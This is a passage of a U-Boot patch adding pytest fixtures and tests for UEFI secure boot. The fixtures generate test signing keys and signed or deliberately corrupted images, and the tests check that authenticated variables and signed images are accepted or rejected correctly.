dbx_hash1.crl; %ssign-efi-sig-list -t "2020-04-06" -c KEK.crt -k KEK.key dbx dbx_hash1.crl dbx_hash1.auth' + % (mnt_point, EFITOOLS_PATH, GUID, EFITOOLS_PATH), + shell=True) + # dbx_hash2 (digest of TEST_db2 certificate, with APPEND_WRITE) + check_call('cd %s; %scert-to-efi-hash-list -g %s -s 256 db2.crt dbx_hash2.crl; %ssign-efi-sig-list -a -c KEK.crt -k KEK.key dbx dbx_hash2.crl dbx_hash2.auth' + % (mnt_point, EFITOOLS_PATH, GUID, EFITOOLS_PATH), + shell=True) + # dbx_db (with TEST_db certificate) + check_call('cd %s; %ssign-efi-sig-list -t "2020-04-05" -c KEK.crt -k KEK.key dbx db.esl dbx_db.auth' + % (mnt_point, EFITOOLS_PATH), + shell=True) + + # Copy image + check_call('cp %s/lib/efi_loader/helloworld.efi %s' % + (u_boot_config.build_dir, mnt_point), shell=True) + + # Sign image + check_call('cd %s; sbsign --key db.key --cert db.crt helloworld.efi' + % mnt_point, shell=True) + # Sign already-signed image with another key + check_call('cd %s; sbsign --key db1.key --cert db1.crt --output helloworld.efi.signed_2sigs helloworld.efi.signed' + % mnt_point, shell=True) + # Create a corrupted signed image + check_call('cd %s; sh %s/test/py/tests/test_efi_secboot/forge_image.sh helloworld.efi.signed helloworld_forged.efi.signed' + % (mnt_point, u_boot_config.source_dir), shell=True) + # Digest image + check_call('cd %s; %shash-to-efi-sig-list helloworld.efi db_hello.hash; %ssign-efi-sig-list -t "2020-04-07" -c KEK.crt -k KEK.key db db_hello.hash db_hello.auth' + % (mnt_point, EFITOOLS_PATH, EFITOOLS_PATH), + shell=True) + check_call('cd %s; %shash-to-efi-sig-list helloworld.efi.signed db_hello_signed.hash; %ssign-efi-sig-list -t "2020-04-03" -c KEK.crt -k KEK.key db 
db_hello_signed.hash db_hello_signed.auth' + % (mnt_point, EFITOOLS_PATH, EFITOOLS_PATH), + shell=True) + check_call('cd %s; %ssign-efi-sig-list -t "2020-04-07" -c KEK.crt -k KEK.key dbx db_hello_signed.hash dbx_hello_signed.auth' + % (mnt_point, EFITOOLS_PATH), + shell=True) + + check_call('virt-make-fs --partition=gpt --size=+1M --type=vfat {} {}'.format( + mnt_point, image_path), shell=True) + check_call('rm -rf {}'.format(mnt_point), shell=True) + + except CalledProcessError as exception: + pytest.skip('Setup failed: %s' % exception.cmd) + return + else: + yield image_path + finally: + call('rm -f %s' % image_path, shell=True) + +# +# Fixture for UEFI secure boot test of intermediate certificates +# + + +@pytest.fixture(scope='session') +def efi_boot_env_intca(request, u_boot_config): + """Set up file system for secure boot test. + + Set up a file system to be used in UEFI secure boot test + of intermediate certificates. + + Args: + request: Pytest request object. + u_boot_config: U-Boot configuration. + + Return: + A path to disk image to be used for testing + """ + image_path = u_boot_config.persistent_data_dir + image_path = image_path + '/test_efi_secboot_intca.img' + + try: + mnt_point = u_boot_config.persistent_data_dir + '/mnt_efi_secboot_intca' + check_call('rm -rf {}'.format(mnt_point), shell=True) + check_call('mkdir -p {}'.format(mnt_point), shell=True) + + # Create signature database + # PK + check_call('cd %s; openssl req -x509 -sha256 -newkey rsa:2048 -subj /CN=TEST_PK/ -keyout PK.key -out PK.crt -nodes -days 365' + % mnt_point, shell=True) + check_call('cd %s; %scert-to-efi-sig-list -g %s PK.crt PK.esl; %ssign-efi-sig-list -c PK.crt -k PK.key PK PK.esl PK.auth' + % (mnt_point, EFITOOLS_PATH, GUID, EFITOOLS_PATH), + shell=True) + # KEK + check_call('cd %s; openssl req -x509 -sha256 -newkey rsa:2048 -subj /CN=TEST_KEK/ -keyout KEK.key -out KEK.crt -nodes -days 365' + % mnt_point, shell=True) + check_call('cd %s; %scert-to-efi-sig-list -g %s KEK.crt KEK.esl; %ssign-efi-sig-list -c PK.crt -k PK.key KEK KEK.esl KEK.auth' + % (mnt_point, EFITOOLS_PATH, GUID, EFITOOLS_PATH), + shell=True) + + # We will have three-tier hierarchy of certificates: + # TestRoot: Root CA (self-signed) + # TestSub: Intermediate CA (signed by Root CA) + # TestCert: User certificate (signed by Intermediate CA, and used + # for signing an image) + # + # NOTE: + # I consulted the following EDK2 document for certificate options: + # BaseTools/Source/Python/Pkcs7Sign/Readme.md + # Please not use them as they are in product system. They are + # for test purpose only. 
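+        # Illustrative aside (not part of this fixture): once the three
+        # certificates below have been generated, the chain can be checked
+        # on the build host with:
+        #   openssl verify -CAfile TestRoot.crt -untrusted TestSub.crt TestCert.crt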
+ + # TestRoot + check_call('cp %s/test/py/tests/test_efi_secboot/openssl.cnf %s' + % (u_boot_config.source_dir, mnt_point), shell=True) + check_call('cd %s; export OPENSSL_CONF=./openssl.cnf; openssl genrsa -out TestRoot.key 2048; openssl req -extensions v3_ca -new -x509 -days 365 -key TestRoot.key -out TestRoot.crt -subj "/CN=TEST_root/"; touch index.txt; touch index.txt.attr' + % mnt_point, shell=True) + # TestSub + check_call('cd %s; touch serial.new; export OPENSSL_CONF=./openssl.cnf; openssl genrsa -out TestSub.key 2048; openssl req -new -key TestSub.key -out TestSub.csr -subj "/CN=TEST_sub/"; openssl ca -in TestSub.csr -out TestSub.crt -extensions v3_int_ca -days 365 -batch -rand_serial -cert TestRoot.crt -keyfile TestRoot.key' + % mnt_point, shell=True) + # TestCert + check_call('cd %s; touch serial.new; export OPENSSL_CONF=./openssl.cnf; openssl genrsa -out TestCert.key 2048; openssl req -new -key TestCert.key -out TestCert.csr -subj "/CN=TEST_cert/"; openssl ca -in TestCert.csr -out TestCert.crt -extensions usr_cert -days 365 -batch -rand_serial -cert TestSub.crt -keyfile TestSub.key' + % mnt_point, shell=True) + # db + # for TestCert + check_call('cd %s; %scert-to-efi-sig-list -g %s TestCert.crt TestCert.esl; %ssign-efi-sig-list -c KEK.crt -k KEK.key db TestCert.esl db_a.auth' + % (mnt_point, EFITOOLS_PATH, GUID, EFITOOLS_PATH), + shell=True) + # for TestSub + check_call('cd %s; %scert-to-efi-sig-list -g %s TestSub.crt TestSub.esl; %ssign-efi-sig-list -t "2020-07-16" -c KEK.crt -k KEK.key db TestSub.esl db_b.auth' + % (mnt_point, EFITOOLS_PATH, GUID, EFITOOLS_PATH), + shell=True) + # for TestRoot + check_call('cd %s; %scert-to-efi-sig-list -g %s TestRoot.crt TestRoot.esl; %ssign-efi-sig-list -t "2020-07-17" -c KEK.crt -k KEK.key db TestRoot.esl db_c.auth' + % (mnt_point, EFITOOLS_PATH, GUID, EFITOOLS_PATH), + shell=True) + ## dbx (hash of certificate with revocation time) + # for TestCert + check_call('cd %s; %scert-to-efi-hash-list -g %s -t "2020-07-20" -s 256 TestCert.crt TestCert.crl; %ssign-efi-sig-list -c KEK.crt -k KEK.key dbx TestCert.crl dbx_a.auth' + % (mnt_point, EFITOOLS_PATH, GUID, EFITOOLS_PATH), + shell=True) + # for TestSub + check_call('cd %s; %scert-to-efi-hash-list -g %s -t "2020-07-21" -s 256 TestSub.crt TestSub.crl; %ssign-efi-sig-list -t "2020-07-18" -c KEK.crt -k KEK.key dbx TestSub.crl dbx_b.auth' + % (mnt_point, EFITOOLS_PATH, GUID, EFITOOLS_PATH), + shell=True) + # for TestRoot + check_call('cd %s; %scert-to-efi-hash-list -g %s -t "2020-07-22" -s 256 TestRoot.crt TestRoot.crl; %ssign-efi-sig-list -t "2020-07-19" -c KEK.crt -k KEK.key dbx TestRoot.crl dbx_c.auth' + % (mnt_point, EFITOOLS_PATH, GUID, EFITOOLS_PATH), + shell=True) + + # Sign image + # additional intermediate certificates may be included + # in SignedData + + check_call('cp %s/lib/efi_loader/helloworld.efi %s' % + (u_boot_config.build_dir, mnt_point), shell=True) + # signed by TestCert + check_call('cd %s; %ssbsign --key TestCert.key --cert TestCert.crt --out helloworld.efi.signed_a helloworld.efi' + % (mnt_point, SBSIGN_PATH), shell=True) + # signed by TestCert with TestSub in signature + check_call('cd %s; %ssbsign --key TestCert.key --cert TestCert.crt --addcert TestSub.crt --out helloworld.efi.signed_ab helloworld.efi' + % (mnt_point, SBSIGN_PATH), shell=True) + # signed by TestCert with TestSub and TestRoot in signature + check_call('cd %s; cat TestSub.crt TestRoot.crt > TestSubRoot.crt; %ssbsign --key TestCert.key --cert TestCert.crt --addcert TestSubRoot.crt --out 
helloworld.efi.signed_abc helloworld.efi' + % (mnt_point, SBSIGN_PATH), shell=True) + + check_call('virt-make-fs --partition=gpt --size=+1M --type=vfat {} {}'.format(mnt_point, image_path), shell=True) + check_call('rm -rf {}'.format(mnt_point), shell=True) + + except CalledProcessError as e: + pytest.skip('Setup failed: %s' % e.cmd) + return + else: + yield image_path + finally: + call('rm -f %s' % image_path, shell=True) diff --git a/test/py/tests/test_efi_secboot/defs.py b/test/py/tests/test_efi_secboot/defs.py new file mode 100644 index 00000000000..6a2317e295b --- /dev/null +++ b/test/py/tests/test_efi_secboot/defs.py @@ -0,0 +1,16 @@ +# SPDX-License-Identifier: GPL-2.0+ + +"""Constants used for secure boot test.""" + +# Owner guid +GUID = '11111111-2222-3333-4444-123456789abc' + +# v1.5.1 or earlier of efitools has a bug in sha256 calculation, and +# you need build a newer version on your own. +# The path must terminate with '/'. +EFITOOLS_PATH = '' + +# "--addcert" option of sbsign must be available, otherwise +# you need build a newer version on your own. +# The path must terminate with '/'. +SBSIGN_PATH = '' diff --git a/test/py/tests/test_efi_secboot/forge_image.sh b/test/py/tests/test_efi_secboot/forge_image.sh new file mode 100644 index 00000000000..2465d10fa7b --- /dev/null +++ b/test/py/tests/test_efi_secboot/forge_image.sh @@ -0,0 +1,5 @@ +# SPDX-License-Identifier: GPL-2.0-or-later +#!/bin/sh + +replace_exp="s/H\0e\0l\0l\0o\0/h\0E\0L\0L\0O\0/g" +perl -p -e ${replace_exp} < $1 > $2 diff --git a/test/py/tests/test_efi_secboot/openssl.cnf b/test/py/tests/test_efi_secboot/openssl.cnf new file mode 100644 index 00000000000..f684f1df7e6 --- /dev/null +++ b/test/py/tests/test_efi_secboot/openssl.cnf @@ -0,0 +1,48 @@ +[ ca ] +default_ca = CA_default + +[ CA_default ] +new_certs_dir = . +database = ./index.txt +serial = ./serial +default_md = sha256 +policy = policy_min + +[ req ] +distinguished_name = def_distinguished_name + +[def_distinguished_name] + +# Extensions +# -addext " ... = ..." +# +[ v3_ca ] + # Extensions for a typical Root CA. + basicConstraints = critical,CA:TRUE + keyUsage = critical, digitalSignature, cRLSign, keyCertSign + subjectKeyIdentifier = hash + authorityKeyIdentifier = keyid:always,issuer + +[ v3_int_ca ] + # Extensions for a typical intermediate CA. + basicConstraints = critical, CA:TRUE + keyUsage = critical, digitalSignature, cRLSign, keyCertSign + subjectKeyIdentifier = hash + authorityKeyIdentifier = keyid:always,issuer + +[ usr_cert ] + # Extensions for user end certificates. 
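+ # These are applied via 'openssl ca -extensions usr_cert' when conftest.py
+ # signs the TestCert leaf certificate.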
+ basicConstraints = CA:FALSE + keyUsage = critical, nonRepudiation, digitalSignature, keyEncipherment + extendedKeyUsage = clientAuth, emailProtection + subjectKeyIdentifier = hash + authorityKeyIdentifier = keyid,issuer + +[ policy_min ] + countryName = optional + stateOrProvinceName = optional + localityName = optional + organizationName = optional + organizationalUnitName = optional + commonName = supplied + emailAddress = optional diff --git a/test/py/tests/test_efi_secboot/test_authvar.py b/test/py/tests/test_efi_secboot/test_authvar.py new file mode 100644 index 00000000000..7b45f8fb814 --- /dev/null +++ b/test/py/tests/test_efi_secboot/test_authvar.py @@ -0,0 +1,281 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2019, Linaro Limited +# Author: AKASHI Takahiro <takahiro.akashi@linaro.org> +# +# U-Boot UEFI: Variable Authentication Test + +""" +This test verifies variable authentication +""" + +import pytest + + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('efi_secure_boot') +@pytest.mark.buildconfigspec('cmd_fat') +@pytest.mark.buildconfigspec('cmd_nvedit_efi') +@pytest.mark.slow +class TestEfiAuthVar(object): + def test_efi_var_auth1(self, ubman, efi_boot_env): + """ + Test Case 1 - Install signature database + """ + ubman.restart_uboot() + disk_img = efi_boot_env + with ubman.log.section('Test Case 1a'): + # Test Case 1a, Initial secure state + output = ubman.run_command_list([ + 'host bind 0 %s' % disk_img, + 'printenv -e SecureBoot']) + assert '00000000: 00' in ''.join(output) + + output = ubman.run_command( + 'printenv -e SetupMode') + assert '00000000: 01' in output + + with ubman.log.section('Test Case 1b'): + # Test Case 1b, PK without AUTHENTICATED_WRITE_ACCESS + output = ubman.run_command_list([ + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -i 4000000:$filesize PK']) + assert 'Failed to set EFI variable' in ''.join(output) + + with ubman.log.section('Test Case 1c'): + # Test Case 1c, install PK + output = ubman.run_command_list([ + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK', + 'printenv -e -n PK']) + assert 'PK:' in ''.join(output) + + output = ubman.run_command( + 'printenv -e SecureBoot') + assert '00000000: 01' in output + output = ubman.run_command( + 'printenv -e SetupMode') + assert '00000000: 00' in output + + with ubman.log.section('Test Case 1d'): + # Test Case 1d, db/dbx without KEK + output = ubman.run_command_list([ + 'fatload host 0:1 4000000 db.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db']) + assert 'Failed to set EFI variable' in ''.join(output) + + output = ubman.run_command_list([ + 'fatload host 0:1 4000000 db.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize dbx']) + assert 'Failed to set EFI variable' in ''.join(output) + + with ubman.log.section('Test Case 1e'): + # Test Case 1e, install KEK + output = ubman.run_command_list([ + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -i 4000000:$filesize KEK']) + assert 'Failed to set EFI variable' in ''.join(output) + + output = ubman.run_command_list([ + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'printenv -e -n KEK']) + assert 'KEK:' in ''.join(output) + + output = ubman.run_command( + 'printenv -e SecureBoot') + assert '00000000: 01' in output + + with ubman.log.section('Test Case 1f'): + # Test Case 1f, install db + output = ubman.run_command_list([ + 'fatload host 0:1 4000000 db.auth', + 'setenv -e -nv -bs -rt -i 
4000000:$filesize db']) + assert 'Failed to set EFI variable' in ''.join(output) + + output = ubman.run_command_list([ + 'fatload host 0:1 4000000 db.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'printenv -e -n -guid d719b2cb-3d3a-4596-a3bc-dad00e67656f db']) + assert 'Failed to set EFI variable' not in ''.join(output) + assert 'db:' in ''.join(output) + + output = ubman.run_command( + 'printenv -e SecureBoot') + assert '00000000: 01' in output + + with ubman.log.section('Test Case 1g'): + # Test Case 1g, install dbx + output = ubman.run_command_list([ + 'fatload host 0:1 4000000 dbx.auth', + 'setenv -e -nv -bs -rt -i 4000000:$filesize dbx']) + assert 'Failed to set EFI variable' in ''.join(output) + + output = ubman.run_command_list([ + 'fatload host 0:1 4000000 dbx.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize dbx', + 'printenv -e -n -guid d719b2cb-3d3a-4596-a3bc-dad00e67656f dbx']) + assert 'Failed to set EFI variable' not in ''.join(output) + assert 'dbx:' in ''.join(output) + + output = ubman.run_command( + 'printenv -e SecureBoot') + assert '00000000: 01' in output + + def test_efi_var_auth2(self, ubman, efi_boot_env): + """ + Test Case 2 - Update database by overwriting + """ + ubman.restart_uboot() + disk_img = efi_boot_env + with ubman.log.section('Test Case 2a'): + # Test Case 2a, update without AUTHENTICATED_WRITE_ACCESS + output = ubman.run_command_list([ + 'host bind 0 %s' % disk_img, + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK', + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 db.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'printenv -e -n -guid d719b2cb-3d3a-4596-a3bc-dad00e67656f db']) + assert 'Failed to set EFI variable' not in ''.join(output) + assert 'db:' in ''.join(output) + + output = ubman.run_command_list([ + 'fatload host 0:1 4000000 db1.auth', + 'setenv -e -nv -bs -rt -i 4000000:$filesize db']) + assert 'Failed to set EFI variable' in ''.join(output) + + with ubman.log.section('Test Case 2b'): + # Test Case 2b, update without correct signature + output = ubman.run_command_list([ + 'fatload host 0:1 4000000 db.esl', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db']) + assert 'Failed to set EFI variable' in ''.join(output) + + with ubman.log.section('Test Case 2c'): + # Test Case 2c, update with correct signature + output = ubman.run_command_list([ + 'fatload host 0:1 4000000 db1.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'printenv -e -n -guid d719b2cb-3d3a-4596-a3bc-dad00e67656f db']) + assert 'Failed to set EFI variable' not in ''.join(output) + assert 'db:' in ''.join(output) + + def test_efi_var_auth3(self, ubman, efi_boot_env): + """ + Test Case 3 - Append database + """ + ubman.restart_uboot() + disk_img = efi_boot_env + with ubman.log.section('Test Case 3a'): + # Test Case 3a, update without AUTHENTICATED_WRITE_ACCESS + output = ubman.run_command_list([ + 'host bind 0 %s' % disk_img, + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK', + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 db.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'printenv -e -n -guid d719b2cb-3d3a-4596-a3bc-dad00e67656f db']) + assert 'Failed to set EFI variable' not in ''.join(output) + assert 'db:' in ''.join(output) + + output = ubman.run_command_list([ + 'fatload 
host 0:1 4000000 db2.auth', + 'setenv -e -nv -bs -rt -a -i 4000000:$filesize db']) + assert 'Failed to set EFI variable' in ''.join(output) + + with ubman.log.section('Test Case 3b'): + # Test Case 3b, update without correct signature + output = ubman.run_command_list([ + 'fatload host 0:1 4000000 db.esl', + 'setenv -e -nv -bs -rt -at -a -i 4000000:$filesize db']) + assert 'Failed to set EFI variable' in ''.join(output) + + with ubman.log.section('Test Case 3c'): + # Test Case 3c, update with correct signature + output = ubman.run_command_list([ + 'fatload host 0:1 4000000 db2.auth', + 'setenv -e -nv -bs -rt -at -a -i 4000000:$filesize db', + 'printenv -e -n -guid d719b2cb-3d3a-4596-a3bc-dad00e67656f db']) + assert 'Failed to set EFI variable' not in ''.join(output) + assert 'db:' in ''.join(output) + + def test_efi_var_auth4(self, ubman, efi_boot_env): + """ + Test Case 4 - Delete database without authentication + """ + ubman.restart_uboot() + disk_img = efi_boot_env + with ubman.log.section('Test Case 4a'): + # Test Case 4a, update without AUTHENTICATED_WRITE_ACCESS + output = ubman.run_command_list([ + 'host bind 0 %s' % disk_img, + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK', + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 db.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'printenv -e -n -guid d719b2cb-3d3a-4596-a3bc-dad00e67656f db']) + assert 'Failed to set EFI variable' not in ''.join(output) + assert 'db:' in ''.join(output) + + output = ubman.run_command_list([ + 'setenv -e -nv -bs -rt db', + 'printenv -e -n -guid d719b2cb-3d3a-4596-a3bc-dad00e67656f db']) + assert 'Failed to set EFI variable' in ''.join(output) + assert 'db:' in ''.join(output) + + with ubman.log.section('Test Case 4b'): + # Test Case 4b, update without correct signature/data + output = ubman.run_command_list([ + 'setenv -e -nv -bs -rt -at db', + 'printenv -e -n -guid d719b2cb-3d3a-4596-a3bc-dad00e67656f db']) + assert 'Failed to set EFI variable' in ''.join(output) + assert 'db:' in ''.join(output) + + def test_efi_var_auth5(self, ubman, efi_boot_env): + """ + Test Case 5 - Uninstall(delete) PK + """ + ubman.restart_uboot() + disk_img = efi_boot_env + with ubman.log.section('Test Case 5a'): + # Test Case 5a, Uninstall PK without correct signature + output = ubman.run_command_list([ + 'host bind 0 %s' % disk_img, + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK', + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 db.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'printenv -e -n PK']) + assert 'Failed to set EFI variable' not in ''.join(output) + assert 'PK:' in ''.join(output) + + output = ubman.run_command_list([ + 'fatload host 0:1 4000000 PK_null.esl', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK', + 'printenv -e -n PK']) + assert 'Failed to set EFI variable' in ''.join(output) + assert 'PK:' in ''.join(output) + + with ubman.log.section('Test Case 5b'): + # Test Case 5b, Uninstall PK with correct signature + output = ubman.run_command_list([ + 'fatload host 0:1 4000000 PK_null.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK', + 'printenv -e -n PK']) + assert 'Failed to set EFI variable' not in ''.join(output) + assert '\"PK\" not defined' in ''.join(output) + + output = ubman.run_command( + 'printenv -e SecureBoot') + assert 
'00000000: 00' in output + output = ubman.run_command( + 'printenv -e SetupMode') + assert '00000000: 01' in output diff --git a/test/py/tests/test_efi_secboot/test_signed.py b/test/py/tests/test_efi_secboot/test_signed.py new file mode 100644 index 00000000000..e8aaef7090c --- /dev/null +++ b/test/py/tests/test_efi_secboot/test_signed.py @@ -0,0 +1,371 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2019, Linaro Limited +# Author: AKASHI Takahiro <takahiro.akashi@linaro.org> +# +# U-Boot UEFI: Signed Image Authentication Test + +""" +This test verifies image authentication for signed images. +""" + +import pytest + + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('efi_secure_boot') +@pytest.mark.buildconfigspec('cmd_efidebug') +@pytest.mark.buildconfigspec('cmd_fat') +@pytest.mark.buildconfigspec('cmd_nvedit_efi') +@pytest.mark.slow +class TestEfiSignedImage(object): + def test_efi_signed_image_auth1(self, ubman, efi_boot_env): + """ + Test Case 1 - Secure boot is not in force + """ + ubman.restart_uboot() + disk_img = efi_boot_env + with ubman.log.section('Test Case 1a'): + # Test Case 1a, run signed image if no PK + output = ubman.run_command_list([ + 'host bind 0 %s' % disk_img, + 'efidebug boot add -b 1 HELLO1 host 0:1 /helloworld.efi.signed -s ""', + 'efidebug boot order 1', + 'bootefi bootmgr']) + assert 'Hello, world!' in ''.join(output) + + with ubman.log.section('Test Case 1b'): + # Test Case 1b, run unsigned image if no PK + output = ubman.run_command_list([ + 'efidebug boot add -b 2 HELLO2 host 0:1 /helloworld.efi -s ""', + 'efidebug boot order 2', + 'bootefi bootmgr']) + assert 'Hello, world!' in ''.join(output) + + def test_efi_signed_image_auth2(self, ubman, efi_boot_env): + """ + Test Case 2 - Secure boot is in force, + authenticated by db (TEST_db certificate in db) + """ + ubman.restart_uboot() + disk_img = efi_boot_env + with ubman.log.section('Test Case 2a'): + # Test Case 2a, db is not yet installed + output = ubman.run_command_list([ + 'host bind 0 %s' % disk_img, + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK']) + assert 'Failed to set EFI variable' not in ''.join(output) + output = ubman.run_command_list([ + 'efidebug boot add -b 1 HELLO1 host 0:1 /helloworld.efi.signed -s ""', + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert('\'HELLO1\' failed' in ''.join(output)) + assert('efi_bootmgr_load() returned: 26' in ''.join(output)) + output = ubman.run_command_list([ + 'efidebug boot add -b 2 HELLO2 host 0:1 /helloworld.efi -s ""', + 'efidebug boot order 2', + 'efidebug test bootmgr']) + assert '\'HELLO2\' failed' in ''.join(output) + assert 'efi_bootmgr_load() returned: 26' in ''.join(output) + + with ubman.log.section('Test Case 2b'): + # Test Case 2b, authenticated by db + output = ubman.run_command_list([ + 'fatload host 0:1 4000000 db.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db']) + assert 'Failed to set EFI variable' not in ''.join(output) + output = ubman.run_command_list([ + 'efidebug boot order 2', + 'efidebug test bootmgr']) + assert '\'HELLO2\' failed' in ''.join(output) + assert 'efi_bootmgr_load() returned: 26' in ''.join(output) + output = ubman.run_command_list([ + 'efidebug boot order 1', + 'bootefi bootmgr']) + assert 'Hello, world!' 
in ''.join(output) + + def test_efi_signed_image_auth3(self, ubman, efi_boot_env): + """ + Test Case 3 - rejected by dbx (TEST_db certificate in dbx) + """ + ubman.restart_uboot() + disk_img = efi_boot_env + with ubman.log.section('Test Case 3a'): + # Test Case 3a, rejected by dbx + output = ubman.run_command_list([ + 'host bind 0 %s' % disk_img, + 'fatload host 0:1 4000000 db.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize dbx', + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK']) + assert 'Failed to set EFI variable' not in ''.join(output) + output = ubman.run_command_list([ + 'efidebug boot add -b 1 HELLO host 0:1 /helloworld.efi.signed -s ""', + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert '\'HELLO\' failed' in ''.join(output) + assert 'efi_bootmgr_load() returned: 26' in ''.join(output) + + with ubman.log.section('Test Case 3b'): + # Test Case 3b, rejected by dbx even if db allows + output = ubman.run_command_list([ + 'fatload host 0:1 4000000 db.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db']) + assert 'Failed to set EFI variable' not in ''.join(output) + output = ubman.run_command_list([ + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert '\'HELLO\' failed' in ''.join(output) + assert 'efi_bootmgr_load() returned: 26' in ''.join(output) + + def test_efi_signed_image_auth4(self, ubman, efi_boot_env): + """ + Test Case 4 - revoked by dbx (digest of TEST_db certificate in dbx) + """ + ubman.restart_uboot() + disk_img = efi_boot_env + with ubman.log.section('Test Case 4'): + # Test Case 4, rejected by dbx + output = ubman.run_command_list([ + 'host bind 0 %s' % disk_img, + 'fatload host 0:1 4000000 dbx_hash.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize dbx', + 'fatload host 0:1 4000000 db.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK']) + assert 'Failed to set EFI variable' not in ''.join(output) + output = ubman.run_command_list([ + 'efidebug boot add -b 1 HELLO host 0:1 /helloworld.efi.signed -s ""', + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert '\'HELLO\' failed' in ''.join(output) + assert 'efi_bootmgr_load() returned: 26' in ''.join(output) + + def test_efi_signed_image_auth5(self, ubman, efi_boot_env): + """ + Test Case 5 - multiple signatures + one signed with TEST_db, and + one signed with TEST_db1 + """ + ubman.restart_uboot() + disk_img = efi_boot_env + with ubman.log.section('Test Case 5a'): + # Test Case 5a, authenticated even if only one of signatures + # is verified + output = ubman.run_command_list([ + 'host bind 0 %s' % disk_img, + 'fatload host 0:1 4000000 db.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK']) + assert 'Failed to set EFI variable' not in ''.join(output) + output = ubman.run_command_list([ + 'efidebug boot add -b 1 HELLO host 0:1 /helloworld.efi.signed_2sigs -s ""', + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert 'Hello, world!' 
in ''.join(output) + + with ubman.log.section('Test Case 5b'): + # Test Case 5b, authenticated if both signatures are verified + output = ubman.run_command_list([ + 'fatload host 0:1 4000000 db2.auth', + 'setenv -e -nv -bs -rt -at -a -i 4000000:$filesize db']) + assert 'Failed to set EFI variable' not in ''.join(output) + output = ubman.run_command_list([ + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert 'Hello, world!' in ''.join(output) + + with ubman.log.section('Test Case 5c'): + # Test Case 5c, rejected if one of signatures (digest of + # certificate) is revoked + output = ubman.run_command_list([ + 'fatload host 0:1 4000000 dbx_hash.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize dbx']) + assert 'Failed to set EFI variable' not in ''.join(output) + output = ubman.run_command_list([ + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert '\'HELLO\' failed' in ''.join(output) + assert 'efi_bootmgr_load() returned: 26' in ''.join(output) + + with ubman.log.section('Test Case 5d'): + # Test Case 5d, rejected if both of signatures are revoked + output = ubman.run_command_list([ + 'fatload host 0:1 4000000 dbx_hash2.auth', + 'setenv -e -nv -bs -rt -at -a -i 4000000:$filesize dbx']) + assert 'Failed to set EFI variable' not in ''.join(output) + output = ubman.run_command_list([ + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert '\'HELLO\' failed' in ''.join(output) + assert 'efi_bootmgr_load() returned: 26' in ''.join(output) + + # Try rejection in reverse order. + ubman.restart_uboot() + with ubman.log.section('Test Case 5e'): + # Test Case 5e, authenticated even if only one of signatures + # is verified. Same as before but reject dbx_hash1.auth only + output = ubman.run_command_list([ + 